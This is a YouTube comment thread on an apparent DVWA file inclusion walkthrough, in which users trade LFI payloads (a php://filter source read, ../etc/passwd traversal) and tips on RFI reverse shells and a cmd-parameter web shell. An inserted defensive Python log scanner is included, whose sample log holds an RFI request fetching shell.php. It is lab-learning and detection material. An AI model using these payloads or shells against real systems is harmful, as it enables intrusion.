Had a few questions about Quote 3 missing - apologies I missed this in the initial video! For anybody stuck at this point take a look at these resources:
www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/
highon.coffee/blog/lfi-cheat-sheet/#php-wrapper-phpfilter
book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-rfi-using-php-wrappers
Essentially we want to read the code of fi.php, not execute it! We can use some of the PHP filter tricks from cheatsheets above to achieve this e.g.
127.0.0.1/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../hackable/flags/fi.php
Then base64 decode the result in whatever way you prefer and see the missing quotes 😉
I have been looking for a way to get the third quote by myself since I wanted to just cat the file with the reverse shell, but I'm running DVWA in Docker and can't easily find php.ini. Can't believe I didn't see this comment, great vid btw
@@johnstyl thanks mate 🥰
Really grateful for all your DVWA videos!!
This rfi blow my head 🤯🤯 thank you for these videos!
🙏🥰
26:00
It solved my issue.
Thank you.
worked ! thanks alot, just saved me
I don't fully understand why you needed to start a Python server? Also, why can we not see the other php file when you checked port 9000, why can we only see shell.php?
It's been a long time since I made this *but* I might have used the HTTP server to verify that the server could make an outbound connection before trying a shell, so that if the shell doesn't work we know it's likely the shell itself, rather than the server's inability to make remote connections.
@_CryptoCat thank you for explaining!
Great video. I'm learning quite a lot. Thank you for providing such information for free.
For the guys asking about the hidden line 3: we got a reverse shell on the system, so you can "cd" to the hackable folder and "cat" the contents of the "fi.php" file.
That way, you'll read the source code behind the file itself, which will expose the hidden line.
e.g.
$ cat /var/www/html/dvwa/hackable/flags/fi.php
Of course, this is the full path to the file on my VM. Replace the path to match your system setup :)
It's a helpful and great video!
Unfortunately, I have some questions when I tried RFI with reverse shell.
Is it possible to get any contact method for you?
You can ask questions here if you want, they might help other people who watch the video in future 🙂
@@_CryptoCat Oh no! My reply had disappeared! RUclips... let me write down the comment, please!🥲
OK! Thank you for your reply!
I run DVWA by vulnerables/web-dvwa docker, and Setup Check are both Enabled.
In addition, I could successfully RFI by visiting the Google page.
However my python http server and nc couldn't get any message, even though the PHP file is just "Hello World!".
Do you have any idea or suggestion?
The comment was sent to the "held for review" section 🙄 Got it now! If you run DVWA within a docker container, you'll need to also run the python http server and nc inside of that docker instance (as by design, you shouldn't be able to communicate with your host OS from the container). You can run commands inside the docker with docs.docker.com/engine/reference/commandline/exec
@@_CryptoCat Got it! Thank you very much! 🥰
Great walk-through! What about Quote 3, though? It's still hidden.
I was able to go back to the command injection page and display the file, but I can't seem to get it using only the file inclusion.
oh yeh good point! you might be able to use some tricks to read the php file source code, check this out - infinitelogins.com/2020/04/25/lfi-php-wrappers-to-obtain-source-code/
@@gordonrogers8118 just open the fi.php file when you get a shell with RFI
Word of advice: never hold the arrow key to scroll like you did in this video, it takes too long. Instead do Ctrl+A and Ctrl+E.
Haha yeh these shortcuts save so much time 🙌
Hey, where do you get that shell.php file? I tried using msfvenom but I couldn't get any reverse shell :(
Quite often I'll just use a really simple shell.php containing:
Then pass the system command as a GET parameter, e.g. victim.oops/?cmd=whoami
For more web shells: github.com/swisskyrepo/PayloadsAllTheThings
For reverse shells, this site is great: www.revshells.com 😉
@@_CryptoCat Thank youuu I love your videos
@@pennyWise_01 thank you 🙏🥰
The PHP function allow_url_include is not enabled. What do I do?
IIRC the settings were covered in the intro ep, but you could also check the docs.
Thanks for your reply 🥰. I fixed my problem in another way.
Thank you @_CryptoCat :)
Wow! I was having trouble getting a shell back because of the contents of shell.php. I had to change those to match yours exactly. In a real world scenario allow_url_include has to be turned on for this to work, right? What if it's turned off, do you know of any way to work around this? Thanks
yep exactly! for PHP you would need allow_url_include enabled for RFI to work but LFI may still be possible without it. require, require_once, include and include_once are vulnerable functions so look out for these when no other form of input validation is in place 😉
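A defender-side addition (not code from the video, DVWA or any commenter): a small Python scanner that flags the include-parameter patterns discussed in the Quote 3 comment above and in this reply, namely `../` traversal, the `php://filter` wrapper used to read the source of fi.php, and remote URLs that only succeed when allow_url_include is on. The access-log lines and the `page` parameter name are constructed for the example; the double-decoding and the extra wrapper schemes go a little beyond what the thread mentions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache-style access log lines (sample input, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd HTTP/1.1" 200 1337
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../hackable/flags/fi.php HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /dvwa/vulnerabilities/fi/?page=http://10.0.0.5:8000/shell.php&cmd=whoami HTTP/1.1" 200 64
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /dvwa/vulnerabilities/fi/?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1337
"""

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify_page_value(value):
    """Return the set of indicator tags for one include-parameter value."""
    # Decode twice so double-encoded traversal (%252e%252e) is not missed.
    v = unquote(unquote(value)).lower()
    tags = set()
    if "../" in v or "..\\" in v:
        tags.add("traversal")
    if v.startswith(("php://", "data:", "expect://", "zip://", "phar://")):
        tags.add("php-wrapper")  # e.g. php://filter used to read source
    if v.startswith(("http://", "https://", "ftp://", "//")):
        tags.add("remote-include")  # RFI; needs allow_url_include=On
    return tags


def scan_access_log(text, param="page"):
    """Return (line_number, raw_value, sorted_tags) for suspicious requests."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # parse_qs splits on the first '=' only, so 'resource=...' survives.
        qs = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for value in qs.get(param, []):
            tags = classify_page_value(value)
            if tags:
                findings.append((n, value, sorted(tags)))
    return findings


if __name__ == "__main__":
    for n, value, tags in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {tags} <- {value}")
```

Real deployments would key on the application's actual include parameter names and alert on any php-wrapper or remote-include hit regardless of response code.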
@@_CryptoCat thanks brother always learning alot from you
@@Kinoti9 🥰
Hi. I'm running my dvwa as a docker. My shell.php works except for the last part /bin/sh
Any ideas for docker hosted reverse scripts please
🇬🇧
Hi mate, I'm not 100% sure but you probably need to have the shell connect back to your Docker IP address, rather than your VM IP address. If you run the Docker container with the -it flag it should give you a shell: docs.docker.com/engine/reference/commandline/exec/
Hey, the local file inclusion doesn't seem to work for me on low level. I'm trying this: "?page=../../../../../../etc/passwd" but it's not working, it only says no such file or directory
Just to double-check, you are on Linux rather than Windows? Have you tried any other files?
@@_CryptoCat Oh yeah, I did try other files; also I was on Windows, which was the main cause. I'm currently researching the Windows file system, but if you know the alternate version of etc/passwd for Windows you could tell me
hmm, seems to get a permission denied
@@_CryptoCat managed to find the etc/passwd and managed to install a reverse shell, THIS IS AWESOME!